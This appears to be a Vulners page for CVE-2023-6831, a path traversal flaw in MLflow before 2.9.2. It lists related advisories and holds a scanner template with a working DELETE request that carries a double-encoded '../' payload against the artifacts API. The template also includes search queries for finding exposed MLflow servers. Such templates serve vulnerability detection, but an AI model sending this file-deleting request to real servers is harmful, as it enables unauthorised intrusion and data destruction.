| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2023-6831 | 21 Dec 202319:16 | – | circl | |
| Mlflow Security Vulnerabilities | 15 Dec 202300:00 | – | cnnvd | |
| CVE-2023-6831 | 15 Dec 202300:00 | – | cve | |
| CVE-2023-6831 Path Traversal: '\..\filename' in mlflow/mlflow | 15 Dec 202300:00 | – | cvelist | |
| Path traversal in MLflow | 15 Dec 202303:30 | – | github | |
| MLflow < 2.9.2 Path Traversal Vulnerability | 12 Nov 202400:00 | – | nessus | |
| CVE-2023-6831 | 15 Dec 202301:15 | – | nvd | |
| BIT-MLFLOW-2023-6831 Path Traversal: '\..\filename' in mlflow/mlflow | 6 Mar 202410:57 | – | osv | |
| GHSA-554W-XH4J-8W64 Path traversal in MLflow | 15 Dec 202303:30 | – | osv | |
| PYSEC-2023-253 | 15 Dec 202301:15 | – | osv |
id: CVE-2023-6831
info:
name: mlflow - Path Traversal
author: byObin
severity: high
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
impact: |
Authenticated attackers can exploit path traversal vulnerabilities to delete arbitrary files on mlflow servers through crafted API requests.
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6831
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
- https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-6831
cwe-id: CWE-22,CWE-29
epss-score: 0.0329
epss-percentile: 0.86983
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: lfprojects
product: mlflow
shodan-query: "http.title:\"mlflow\""
fofa-query:
- title="mlflow"
- app="mlflow"
google-query: intitle:"mlflow"
tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive,vuln
http:
- raw:
- |
PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{randstr}}
- |
DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- "Content-Type: application/json"
- "Server: gunicorn"
condition: and
- type: word
part: body_2
words:
- "{}"
- type: status
status:
- 500
# digest: 4a0a00473045022036e50c7f11c82d6f663321e9b5bdafede695cb536cbf927a44ae3887b58dd0d402210086ff5542586cecf1e28117ab91244f9bf414d61851c9a6836e538aefd3fddbcd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation